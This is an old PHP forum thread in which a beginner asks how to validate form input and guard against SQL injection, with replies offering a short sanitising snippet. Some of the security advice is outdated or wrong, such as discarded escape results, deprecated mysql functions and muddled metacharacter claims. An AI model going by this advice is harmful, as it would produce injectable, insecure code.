1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

PHP Form validation

Discussion in 'PHP' started by X.Homer.X, Jun 17, 2008.

  1. #1
    how would i go about vaildating my forms with is_numeric, or regex, and protecting against from sql injection using mysql_real_escape_string(), htmlspecialchars(). there are 3 things i would like to validate for/protect. each in a different form,

    one for one or two words, 0-30 characters
    one for a number, 1-3 digits
    one for a text block (paragraph)

    could someone explain how i would validate/protect each type of form.
    SEMrush
    thanks =]
     
    X.Homer.X, Jun 17, 2008 IP
    SEMrush
  2. EricBruggema

    EricBruggema Well-Known Member

    Messages:
    1,731
    Likes Received:
    26
    Best Answers:
    13
    Trophy Points:
    175
    #2
    is_numeric for a number

    and what for letters can a text block contain (all or just only letters and no symbols?)
     
    EricBruggema, Jun 18, 2008 IP
  3. X.Homer.X

    X.Homer.X Peon

    Messages:
    290
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #3
    whatever would allow english to be spoken with no problems. Periods, quotes, commas, etc no slashes tho.
     
    X.Homer.X, Jun 18, 2008 IP
  4. melol2

    melol2 Active Member

    Messages:
    511
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    80
    #4
    Here is a basic one
    On recieving PHP end:

    
    <?
    if(isset($_POST['1']) == true && strlen($_POST['1'])<31) {
    mysql_real_escape_string(strip_tags($_POST['1']));
    // 30 chars or less and is sanitized.
    }
    
    if(is_numeric($_POST['2']) == true && strlen($_POST['2'])<4) {
    //Is a number and is 3 chars or less
    }
    
    if(isset($_POST['3']) == true && strlen($_POST['3'])<1000) {
    mysql_real_escape_string(strip_tags($_POST['3']));
    //is less than 1000 chars and is sanitized;
    }
    ?>
    
    PHP:
     
    melol2, Jun 18, 2008 IP
    X.Homer.X likes this.
  5. X.Homer.X

    X.Homer.X Peon

    Messages:
    290
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #5
    .. i dont use an array to handle post.. i dont understand what this script is doing (im a complete noob to mysql_real_escape_string, strip_tags, htmlspecialchars and all that protection stuff) this is my first time using this type of form on a web page. Can you explain the code?
     
    X.Homer.X, Jun 19, 2008 IP
  6. melol2

    melol2 Active Member

    Messages:
    511
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    80
    #6
    $_POST is a global array of all variables sent by a post form.
    and mysql_real_escape_string adds backslashes to characters such as quotes and backslashes.
    and strip_tags removes most tags that can be used in html and php.
     
    melol2, Jun 19, 2008 IP
  7. X.Homer.X

    X.Homer.X Peon

    Messages:
    290
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #7
    could i use htmlspecialchars() as well, so that & and stuff will be correctly stored?

    and could i get my $_POST like normal like $_POST['name'] instead of $_POST['1']?

    thanks.
     
    X.Homer.X, Jun 19, 2008 IP
  8. melol2

    melol2 Active Member

    Messages:
    511
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    80
    #8
    I dont think strip_tags strips & it only strips html such as "<". But yes you can use htmlspecialchars() instead of that.

    and yes. the example was only if your input was say:
    <input name="1" value="pie">
    Code (markup):
     
    melol2, Jun 20, 2008 IP
  9. X.Homer.X

    X.Homer.X Peon

    Messages:
    290
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #9
    okay, thanks, im pretty sure i understand how i would use this now. Thanks =] +rep'd
     
    X.Homer.X, Jun 20, 2008 IP
  10. X.Homer.X

    X.Homer.X Peon

    Messages:
    290
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #10
    okay, this adds \ before all the excaped characters, but it also shows when it is echoed. is there any way i can strip the clashes (will strip_slashes work?)
     
    X.Homer.X, Jun 20, 2008 IP
  11. Skullborg

    Skullborg Guest

    Messages:
    757
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    0
    #11
    FYI: Make sure your script filters metacharacters from user input so that your site would be 100% RFI (remote file inclusion) safe.
     
    Skullborg, Jun 20, 2008 IP
  12. X.Homer.X

    X.Homer.X Peon

    Messages:
    290
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #12
    huh? metacharacters? im new to this php sanitization thing, can you explain this thing you call metacharacters? :p
     
    X.Homer.X, Jun 20, 2008 IP
  13. Skullborg

    Skullborg Guest

    Messages:
    757
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    0
    #13
    Some metacharacters are:
    ^ $ \ / ( ) | ? + * [ ] { } < > , .

    Can be used to inject malicious coding into a site.
     
    Skullborg, Jun 21, 2008 IP
  14. X.Homer.X

    X.Homer.X Peon

    Messages:
    290
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #14
    would htmlspecialchars() strip that? and return it as &amp; or whatever?

    because im using mysql_real_escape_string(htmlspecialchars());

    would this filter those?, also, it puts slashes before " and other excaped characters, would strip_slashes(); get rid of these?
     
    X.Homer.X, Jun 21, 2008 IP
  15. Skullborg

    Skullborg Guest

    Messages:
    757
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    0
    #15
    Yeah it might, give me a link to your site, Will see whether its RFI vulnerable. ( I'll cause no harm, just a simple test )
     
    Skullborg, Jun 23, 2008 IP
  16. X.Homer.X

    X.Homer.X Peon

    Messages:
    290
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #16
    well all my forms are in my admin panel, (except login) and i dont exactly know how to sanitise that one, but i think phpbb3 may do that automatically (thats how the login script is handled). I will make a page that is accessibly to anyone.

    EDIT: the site has been PM'd to you. (dont want 'hackers' to see this and exploit possibly loopholes i missed.)
     
    X.Homer.X, Jun 24, 2008 IP